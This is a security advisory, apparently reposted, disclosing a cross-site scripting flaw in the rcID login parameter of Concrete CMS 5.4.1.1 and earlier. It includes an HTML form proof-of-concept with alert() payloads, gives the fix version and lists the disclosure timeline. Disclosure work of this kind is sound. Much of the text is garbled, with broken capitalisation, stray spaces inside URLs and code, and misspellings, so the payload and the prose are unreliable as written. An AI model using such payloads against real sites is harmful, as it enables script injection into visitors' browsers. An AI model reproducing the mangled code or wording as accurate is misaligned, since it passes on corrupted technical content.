YGN Ethical Hacker Group (lists yehg net)
Concrete CMS 5.4.1.1 <= Cross Site Scripting
1. Overview
Concrete CMS 5.4.1.1 and earlier version scripts have cross-site Defects
2. Background
Concrete5 makes running a website easy. Go to any page in your site,
And a editing toolbar gives you all the controls you need to update
Your website. No intimidating manuals, no complicated administration
Interfaces-just point and click.
3. defect description
The rcID parameter is not properly sanitized, which allows attacker
Conducting CT Cross Site Scripting attack. This may allow an attacker
Create a specially crafted URL that wowould execute arbitrary script
Code in a victim's browser.
4. Affected Versions
<= 5.4.1.1
5. PROOF-OF-CONCEPT/EXPLOIT
Vulnerable parameter: rcID
<Form action = "http: // [www.2cto.com]/Concrete/index. php/login/do_login /"
Method = "post">
<Input type = "hidden" name = "uName" value = "test"/>
<Input type = "hidden" name = "uPassword" value = "test"/>
<Input type = "hidden" name = "rcID" value = '"
Style = display: block; color: red; width: 9999; height: 9999; z-index: 9999; top: 0;
Left: 0; background-image: url (javascript: alert (/XSS/); width: expression (al
Ert (/XSS /));
Onmouseover = "alert (/XSS/) '/>
<Input type = "submit" name = "submit" value = "Get Concrete CMS 5.4.1.1 XSS"/>
</Form>
6. SOLUTION
Upgrade to 5.4.2 or higher.
7. VENDOR
Concrete CMS Developers
Http://www.concrete5.org/
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. disclosure time-LINE
2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
Http://yehg.net/lab/pr0js/advisories/?concrete_5.4.1.1=_cross_site_scrip
Ting
Project Home: http://www.concrete5.org/
Vendor Release Note:
Http://www.concrete5.org/documentation/background/version_history/5-4-2-
Release-notes/
# Yehg [2011-08-23]